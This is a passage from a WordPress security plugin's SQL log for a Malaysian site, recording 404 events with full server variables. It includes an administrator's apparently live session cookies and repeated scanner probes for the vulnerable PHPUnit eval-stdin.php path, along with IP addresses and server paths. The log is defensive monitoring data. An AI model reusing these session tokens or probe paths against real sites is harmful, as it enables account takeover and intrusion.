br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_CACHE_CONTROL\";s:9:\"max-age=0\";s:11:\"HTTP_COOKIE\";s:774:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_sec_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C7666d1ce86dd205c7585f82f8f746a43fec60d35baf243ae9d603987f35459c0; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C96d187f4ef032996fbf808f94ac1a8bab67286bc737d9ad6ec25670084de842b; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1; wp-settings-time-1=1569226408; wp-saving-post=1410-saved; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7Ceb19a3fe82fc8ce4d135151b0fa401c08e97aa9bf901e8cdeaea7983f994015d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"9\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"331-9\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:2:\"on\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:2:\"on\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"9\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"331-9\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-admin.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-admin.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlj4ExABsgUhwCb1f37mgAAAAk\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-admin.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-admin.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYlj4ExABsgUhwCb1f37mgAAAAk\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.214\";s:11:\"REMOTE_PORT\";s:5:\"54740\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-admin.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-admin.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYlj4ExABsgUhwCb1f37mgAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569285088.6743\";s:12:\"REQUEST_TIME\";s:10:\"1569285088\";}}','notice','2019-09-24 00:31:30','2019-09-24 00:31:29',31648688,31910928,'https://bintara.com.my/wp-admin.php',1,1,'175.142.115.214'),(26885,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:85:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:51:\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:59:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:68:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:77:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:82:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:82:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:83:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:78:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:81:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkXbrKAG8MsefIeiScJgAAAIo\";s:73:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:73:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:74:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:69:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:72:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkXbrKAG8MsefIeiScJgAAAIo\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:65:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:60:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:63:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkXbrKAG8MsefIeiScJgAAAIo\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkXbrKAG8MsefIeiScJgAAAIo\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkXbrKAG8MsefIeiScJgAAAIo\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkXbrKAG8MsefIeiScJgAAAIo\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkXbrKAG8MsefIeiScJgAAAIo\";s:19:\"REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:51:\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYlkXbrKAG8MsefIeiScJgAAAIo\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"47.89.208.37\";s:11:\"REMOTE_PORT\";s:5:\"55368\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:73:\"https://bintara.com.my/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:10:\"SCRIPT_URL\";s:51:\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYlkXbrKAG8MsefIeiScJgAAAIo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569285213.166\";s:12:\"REQUEST_TIME\";s:10:\"1569285213\";}}','notice','2019-09-24 00:33:34','2019-09-24 00:33:33',30802696,32609648,'https://bintara.com.my/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',1,0,'47.89.208.37'),(26886,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:91:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:57:\"/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:59:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:68:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:77:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:86:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:91:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:91:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:92:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:87:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:90:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkZLrKAG8MsefIeiScJwAAAJc\";s:82:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:82:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:83:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:78:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:81:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkZLrKAG8MsefIeiScJwAAAJc\";s:73:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:73:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:74:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:69:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:72:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkZLrKAG8MsefIeiScJwAAAJc\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:65:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:60:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:63:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkZLrKAG8MsefIeiScJwAAAJc\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkZLrKAG8MsefIeiScJwAAAJc\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkZLrKAG8MsefIeiScJwAAAJc\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkZLrKAG8MsefIeiScJwAAAJc\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkZLrKAG8MsefIeiScJwAAAJc\";s:19:\"REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:57:\"/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYlkZLrKAG8MsefIeiScJwAAAJc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"47.89.208.37\";s:11:\"REMOTE_PORT\";s:5:\"53073\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:79:\"https://bintara.com.my/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:10:\"SCRIPT_URL\";s:57:\"/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYlkZLrKAG8MsefIeiScJwAAAJc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569285220.2911\";s:12:\"REQUEST_TIME\";s:10:\"1569285220\";}}','notice','2019-09-24 00:33:41','2019-09-24 00:33:40',30809944,32621792,'https://bintara.com.my/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',1,0,'47.89.208.37'),(26887,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:91:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:56:\"/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:59:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:68:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:77:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:86:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:91:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:91:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s: